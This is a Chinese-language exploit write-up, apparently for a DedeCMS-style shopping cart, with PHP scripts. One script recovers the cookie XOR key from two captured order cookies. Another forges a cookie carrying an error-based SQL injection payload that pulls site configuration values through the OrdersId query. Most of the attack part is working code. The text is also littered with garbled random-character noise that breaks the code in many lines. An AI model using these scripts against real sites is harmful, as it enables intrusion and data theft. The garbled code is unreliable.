www.xxx.com/plus/search.php?keyword=$ ^- } n) w1 S! I
在 include/shopcar.class.php中
先看一下这个shopcar类是如何生成cookie的
function saveCookie($key,$value)
{
    // Writes one shop-cart cookie named $key. Arrays are first flattened by
    // enCode() (per the surrounding text, into a=yy&b=cc&d=know form); the
    // resulting string is then passed through enCrypt().
    if(is_array($value))
    {
        $value = $this->enCrypt($this->enCode($value));
    }
    else
    {
        $value = $this->enCrypt($value);
    }
    // NOTE(review): the value is only obscured by enCrypt()/setKey() (a
    // repeating-key XOR); no integrity tag is attached, so anyone who knows the
    // site-wide key can produce a cookie the server will accept. Lifetime is
    // 36000 s on path '/', and no httponly/secure flags are passed. A keyed MAC
    // (hash_hmac) over the value, checked wherever the cookie is read, would
    // make tampering detectable.
    setcookie($key,$value,time()+36000,'/');
}
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
function enCrypt($txt)
{
    // Obscures $txt for storage in a cookie. The per-call key is derived from
    // rand(0, 32000), so only 32001 distinct $encrypt_key values are possible
    // (the surrounding text relies on exactly this); seeding srand() from
    // microtime() does not widen that space. random_bytes() is the appropriate
    // source for a per-message key.
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // Wrap the key index once all 32 hex characters of the md5 are used.
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        // Each output pair is: one key character in the clear, then the
        // plaintext byte XOR'd with that same character. Since the key
        // characters travel alongside the ciphertext, this layer provides no
        // secrecy on its own; everything rests on setKey()'s fixed key.
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    // Second layer: XOR the interleaved stream with the site-wide key, then base64.
    return base64_encode($this->setKey($tmp));
}
function setKey($txt)
{
    // Repeating-key XOR of $txt with the 32-character md5 hex digest of the
    // site-wide $cfg_cookie_encode setting (strtolower() also discards any
    // case in the configured secret). Every key byte is an ASCII hex digit,
    // so each position has only 16 possible values, and any 32 bytes of known
    // plaintext expose the entire key stream. This is obfuscation, not
    // encryption: an authenticated construction (hash_hmac over the value, or
    // a proper AEAD) is needed to prevent cookie forgery.
    global $cfg_cookie_encode;
    $encrypt_key = md5(strtolower($cfg_cookie_encode));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // Cycle through the 32 key characters.
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的3 e" r3 U( I6 f
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。. S5 y% l% o; h, v( x$ S9 @, R
具体代码如下:
<?php1 [# ]* G, p! `3 d' h; [. i
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here" m0 a2 F' z& P D. t( i
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here% f1 A$ K0 t6 {( n: @% I4 l) ^
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
h6 o9 ?- F& ^function reStrCode($code,$string)6 w4 { w# f$ ~3 U/ O
{
$ P, g' p3 F4 K$ |5 g1 H$code = base64_decode($code);
0 R# p1 \5 y5 f# ]( M, v! D$ k ~$key = “”;
) u7 K9 A% F8 G! F5 efor($i=0 ; $i<32 ; $i++)
' E0 g% `& V; Q& W{& y R; d4 q1 y9 I/ m3 W
$key .= $string[$i] ^ $code[$i];
. {: c+ z* Z+ z& T7 }% E$ b A}7 f7 V4 h" F- g5 m @3 S* {5 ~& |4 P* |
return $key;6 M/ m' K7 E' e g
}
/ H* V5 v0 V% E: u. D# i4 ?function getKeys($cookie,$plantxt) [& ?8 P7 O: X$ d
{$ l5 e. h4 F4 o
$tmp = $cookie;
# t1 B, [# ]7 p" w) o6 }8 E$results = array();# \1 E9 I$ x- `
for($j=0 ; $j < 32000; $j++); Y7 }$ Z% U" O# ]0 }
{
' t& k5 d1 h9 L8 D8 ^8 y! a) R
6 N8 R! n. ^& \$txt = $plantxt;
+ Z L; d; a) Y2 b! t# d: x$ctr = 0;5 G, j7 v! o5 u/ E6 }! K( |- h4 M
$tmp = ”;8 |% i' c* p6 y0 o u
$encrypt_key = md5($j);: D1 B& ?- u4 r; F5 d# W& I
for($i =0; $i < strlen($txt); $i ++)
* `( h' \* x3 [{& [' w# ~3 K7 r. T9 s8 B! L# t# T3 M" F
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
0 I0 o) M6 L6 ~) H0 R) E+ d$ m$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);8 Y) A1 N' D9 m$ E! g, i
}* F( U d* g* ~# b
$string = $tmp;
* D6 e! P" ?% h9 H: _$code = $cookie;
7 c/ o) d( J4 ]* j% E# _1 K4 D& g$result = reStrCode($code,$string);
; T2 e% ~$ T: \% l+ _if(eregi(‘^[a-z0-9]+$’,$result))
" S0 W M8 x9 V9 W/ h( M$ g1 J4 Z{, [- h/ |3 [2 ?; o( W2 D- \
echo $result.”\n”;5 L0 b0 S. e# T/ K3 l/ o: [/ S' k1 |
$results[] = $result;2 A: V7 T/ {% J p
}3 m9 m: Q. e! h2 ^
}. p+ c% A! A. d( G# h/ b
return $results;2 Z7 V: J& I5 `" L
}
4 {. ^6 v0 L( p$results1 = getKeys($cookie1,$plantxt);) N3 m& ~; L& ^
$results2 = getKeys($cookie2,$plantxt);( C, K Y) Z; j# }* `% p4 N
print “\n——————–real key————————–\n”;
) V1 m( v7 x, F. d1 y; Gforeach($results1 as $test1)
$ V H8 k5 \$ G# P- S* i{" h7 [' c: }5 F1 O3 Z, d; A% P
foreach($results2 as $test2)
3 Y: p2 E* H9 }4 r{2 b7 T# S; `- g5 }. ^" u
if($test1 == $test2)
, U: C* s3 a+ G* E' d{8 x+ r2 U. E& q: d) s9 l
echo $test1.”\n”;1 _8 ]2 n) X' c" ~9 S
}
; x) L- s7 K8 S. D9 K0 ]2 i}: d& q. h4 u ]3 W
}* y& v/ _) @4 l6 t' f) V( g' @4 Y
?>+ Z2 F* R, m- e! J' w" _$ P
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出md5(strtolower($cfg_cookie_encode))
得到这个key之后,我们就可以构造任意购物车的cookie
接着看
# a8 T, u9 q- I0 ^$ v20 class MemberShops( L% {" o4 l! U5 R! M
21 {
0 m3 r; D3 T/ E3 _$ P* h/ M22 var $OrdersId;
1 d1 U' k) }& B2 C; ^- z23 var $productsId;4 ]( B( ~7 ^9 c/ W
24+ y. L# K' ^; s* m- O
function __construct()
{
    // The order id is taken straight from the client's "OrdersId" cookie
    // (getCookie() is not shown here; presumably it reverses saveCookie()'s
    // obfuscation — verify). Nothing in this block validates its format, and
    // /plus/carbuyaction.php (line 173 in the text above) interpolates
    // $cart->OrdersId directly into an SQL string, so a client-controlled
    // cookie value reaches the query. Validate against the expected id format
    // here and use a parameterised query at that call site.
    $this->OrdersId = $this->getCookie("OrdersId");
    // Only an empty/absent cookie triggers server-side id generation.
    if(empty($this->OrdersId))
    {
        $this->OrdersId = $this->MakeOrders();
    }
}
发现OrdersId是从cookie里面获取的
然后
/plus/carbuyaction.php中的
5 u$ x* Q+ F% H# _) D% Q& V* Y29 $cart = new MemberShops();
& ~' [% Y4 O& N& y3 [) v3 L; [39 $OrdersId = $cart->OrdersId; //本次记录的订单号
( m O l6 W0 t+ ^; M) l……
5 c- ~$ ?; ^3 G! C173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
6 r* m; Z; S1 |& [' I [接着我们就可以注入了
2 M( G! z5 b. r) w+ b+ a通过利用下面代码生成cookie:
" n5 I4 c9 v$ g: R/ S<?php/ v, U$ H% P: X5 @. a+ g; [
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
! O# D# r* b4 E) T$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here, K( b/ K8 N8 E" F6 P9 K: m7 ]- z
function setKey($txt)
9 M. R3 Q: K$ b" B' {0 o- p1 a) E{
' Z5 L% R. i+ u2 C }/ M% r+ N* Zglobal $encrypt_key;
1 q" @- b1 S: N5 c6 G$ctr = 0;
# J+ U9 h0 Z. s" H- l$tmp = ”;- P8 l! \7 Z; \; y
for($i = 0; $i < strlen($txt); $i++)
7 [. K( ^6 n/ b. G+ s) f: t5 k{
2 l3 d0 e/ v6 L* ^$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;- e$ {6 W3 S9 T+ l& S) v
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
r- u2 E. b4 N}
( z1 G! |, N4 n9 Q5 |' t& j* M3 Z" @return $tmp;! }. N. m% R( R/ ^/ b9 O: |! Q) v
}
, u( m4 A& D8 X5 ffunction enCrypt($txt)
# m. n0 N1 V n& x* I9 }6 @4 y{
; z3 V* u5 J4 L6 Fsrand((double)microtime() * 1000000);9 V9 a) p2 X0 N, U
$encrypt_key = md5(rand(0, 32000));
% |( z& G/ _7 q2 q L7 A$ctr = 0;
( \" R8 O, @6 z( q9 u+ V$tmp = ”;7 p: F& L' b: ~/ h( T8 Q" N
for($i = 0; $i < strlen($txt); $i++)7 x5 J$ w7 u4 l* J P# U4 x
{0 ~! S1 B/ U: p$ i
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$ x0 ?( n6 f" p$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);- O `; h" p3 y' c% X
}0 F' I3 ?* O% G* R
return base64_encode(setKey($tmp));7 L/ i( Z) s: k- U" {
}
& f" o6 M" ^0 ^# A' X% H$ Zfor($dest =0;$dest = enCrypt($txt);)6 o% ^- ?: \' G! ]3 z6 t- H; H
{
; A, L" r% A1 W; K: zif(!strpos($dest,’+'))
7 |7 j8 j* {' d: a{* T0 O, t( a: _* w/ h4 h1 m% \
break;( X* ]5 c: ^, }" h$ x
}' U. n. ?$ B) ?; b0 V* B
}
6 w/ ?) T8 B4 ~- }0 U5 a# Aecho $dest.”\n”;
% z; s: O& G1 X+ I2 J?>
+ t% J5 U; o* S3 o
# G% v. q( P) U6 {2 f4 x7 W6 a8 v |